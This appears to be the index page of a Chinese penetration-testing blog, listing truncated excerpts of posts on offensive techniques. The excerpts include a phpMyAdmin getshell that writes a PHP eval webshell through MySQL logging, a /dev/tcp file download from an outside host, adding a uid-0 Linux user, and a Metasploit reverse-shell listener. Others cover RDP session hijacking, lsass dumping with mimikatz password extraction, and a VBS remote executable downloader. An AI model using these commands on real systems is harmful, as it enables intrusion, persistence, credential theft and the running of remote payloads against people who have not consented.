phpmyadmin getshell 记录
2019年09月08日 No comment phpmyadmin getshellselect '<?php @eval($_POST[admin])?>';
show global variables like '%general%';
set global general_log = on;
set global gen
阅读全文 »
Windows提权辅助工具Windows-Exploit-Suggester
2019年08月14日 No comment安装 python 3.3.3安装xlrd库 https://pypi.org/project/xlrd/https://www.python.org/ftp/python/3.3.3/python-3.3.3.amd64.msihttps://www.python.org/ftp/python/3.3.3/python-3.3.
阅读全文 »
linux常用渗透小技巧
2019年08月09日 No comment无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0
阅读全文 »
Nmap常用命令
2019年08月06日 No comment注:本为是笔记,参考多人的文章,仅供大家学习参考。原作者文章链接:https://www.cnblogs.com/hanxiaobei/p/5603491.htmlhttp://blog.jobbole.com/54595/----------------------------------------------------------------------------nmap是网络扫描和主机检测的工具。用nmap进行信息收集和检测漏洞,功能有: 检测存活主机。 检测主机开放端口(端口发
阅读全文 »
记一次曲折的获取网站路径
2019年07月28日 No comment 网站php mysql 存在sql注入root权限 跑库的时候表是非常多常见的admin member user manage 都看完了 没有找到需要的数据 只能一个一个重新找 最后发现存在管理员的表的是一个不显眼的表里面,登录到后台发现后台只验证账号不验证密码。 &nb
阅读全文 »
powershell反弹shell 的几种方法
2019年07月20日 No comment 如果想接收多个sessions的话,用msf执行以下命令进行监听 反弹成功以后,用sessions id 来选择要操作的目标 NC反弹msfconsole
use exploit/multi/hanler
set payload windows/shell/reverse_tcp
set lhost 1
阅读全文 »
EarthWorm详细用法
2019年07月17日 No comment正向socks v5服务器【适用于目标机器拥有一个外网IP】服务器端执行以下命令ew.exe -s ssocksd -l 888说明:服务器开启端口为888,SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。-------------------------------------------------------------------------------------------反弹socks v5服务器【适用于目标机器没有公网IP,但可访问内网资源】本地执行
阅读全文 »
RDP劫持会话
2019年07月16日 No commentRDP劫持会话sc create sesshijack binpath="cmd.exe /k tscon 1 /dest:rdp-tcp#46"1为要劫持的会话ID dest为 sessionname net start sesshijack参考链接https://www.youtube.com/watch?v=OgsoIoWmhWw
阅读全文 »
用Procdump获取win密码
2019年07月16日 No comment Procdump出win密码procdump64.exe -accepteula -ma lsass.exe lsass.dmp将导出的日志利用 mimikatz 进行破解mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" 
阅读全文 »
常用的远程下载方法
2019年07月11日 No comment常用的远程下载方法针对某些服务器禁止上传vbs下载文件Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.xxx.com/2.exe",0
Post.Send()
Set
阅读全文 »